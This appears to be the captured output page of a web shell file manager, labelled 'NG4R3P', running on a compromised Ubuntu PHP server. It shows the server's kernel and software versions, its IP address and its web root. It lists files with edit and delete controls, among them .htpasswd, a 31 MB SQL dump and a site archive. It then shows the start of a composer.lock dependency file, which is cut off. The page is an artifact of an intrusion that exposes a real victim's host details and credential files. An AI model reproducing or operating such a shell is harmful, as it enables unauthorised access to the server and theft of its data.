NG4R3P
Linux backups 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
  SOFT : Apache/2.4.18 (Ubuntu) PHP : 7.2.34-8+ubuntu16.04.1+deb.sury.org+1
/var/www/vagas/
138.68.56.76

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
application dir drwxr-xr-x 2021-05-07 12:16 R D
static dir drwxr-xr-x 2021-05-07 12:23 R D
system dir drwxr-xr-x 2021-05-07 12:20 R D
vendor dir drwxr-xr-x 2021-12-21 12:45 R D
.htaccess 0.214 KB -rw-r--r-- 2020-12-02 21:07 R E G D
.htaccess.save 0.313 KB -rw-r--r-- 2020-11-25 21:00 R E G D
.htpasswd 0.047 KB -rw-r--r-- 2020-11-25 17:14 R E G D
composer.json 0.103 KB -rw-r--r-- 2019-11-28 23:09 R E G D
composer.lock 17.761 KB -rw-r--r-- 2019-11-28 23:09 R E G D
ice.sql 31.69 MB -rw-r--r-- 2020-11-25 16:50 R E G D
index.php 9.661 KB -rwxr-xr-x 2021-05-07 12:19 R E G D
vagas.zip 40.62 MB -rw-r--r-- 2020-12-02 17:20 R E G U D
REQUEST EXIT
{ "_readme": [ "This file locks the dependencies of your project to a known state", "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies", "This file is @generated automatically" ], "content-hash": "65d932389e9f6cc0902623aa9f195fc4", "packages": [ { "name": "enotas/php-client-v2", "version": "v1.0.1", "source": { "type": "git", "url": "https://github.com/eNotasGW/php-client-v2.git", "reference": "4c69e27047b991863978aacebc4766f1bd90cf89" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/eNotasGW/php-client-v2/zipball/4c69e27047b991863978aacebc4766f1bd90cf89", "reference": "4c69e27047b991863978aacebc4766f1bd90cf89", "shasum": "" }, "require": { "php": ">=5.3.0" }, "type": "library", "autoload": { "psr-4": { "eNotasGW\\Api\\": "src/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "authors": [ { "name": "eNotas Gateway", "email": "suporte@enotasgw.com.br" } ], "description": "eNotas GW API client for PHP v2", "homepage": "https://github.com/eNotasGW/php-client-v2", "keywords": [ "NF-e", "NFC-e", "eNotas" ], "time": "2019-01-10T17:17:52+00:00" }, { "name": "justinrainbow/json-schema", "version": "5.2.9", "source": { "type": "git", "url": "https://github.com/justinrainbow/json-schema.git", "reference": "44c6787311242a979fa15c704327c20e7221a0e4" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/justinrainbow/json-schema/zipball/44c6787311242a979fa15c704327c20e7221a0e4", "reference": "44c6787311242a979fa15c704327c20e7221a0e4", "shasum": "" }, "require": { "php": ">=5.3.3" }, "require-dev": { "friendsofphp/php-cs-fixer": "~2.2.20||~2.15.1", "json-schema/json-schema-test-suite": "1.2.0", "phpunit/phpunit": "^4.8.35" }, "bin": [ "bin/validate-json" ], "type": "library", "extra": { "branch-alias": { "dev-master": "5.0.x-dev" } }, "autoload": { "psr-4": { "JsonSchema\\": "src/JsonSchema/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "authors": [ { "name": "Bruno Prieto Reis", "email": "bruno.p.reis@gmail.com" }, { "name": "Justin Rainbow", "email": "justin.rainbow@gmail.com" }, { "name": "Igor Wiedler", "email": "igor@wiedler.ch" }, { "name": "Robert Schönthal", "email": "seroscho@googlemail.com" } ], "description": "A library to validate a json schema.", "homepage": "https://github.com/justinrainbow/json-schema", "keywords": [ "json", "schema" ], "time": "2019-09-25T14:49:45+00:00" }, { "name": "league/flysystem", "version": "1.0.46", "source": { "type": "git", "url": "https://github.com/thephpleague/flysystem.git", "reference": "f3e0d925c18b92cf3ce84ea5cc58d62a1762a2b2" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/thephpleague/flysystem/zipball/f3e0d925c18b92cf3ce84ea5cc58d62a1762a2b2", "reference": "f3e0d925c18b92cf3ce84ea5cc58d62a1762a2b2", "shasum": "" }, "require": { "php": ">=5.5.9" }, "conflict": { "league/flysystem-sftp": "<1.0.6" }, "require-dev": { "ext-fileinfo": "*", "phpspec/phpspec": "^3.4", "phpunit/phpunit": "^5.7.10" }, "suggest": { "ext-fileinfo": "Required for MimeType", "ext-ftp": "Allows you to use FTP server storage", "ext-openssl": "Allows you to use FTPS server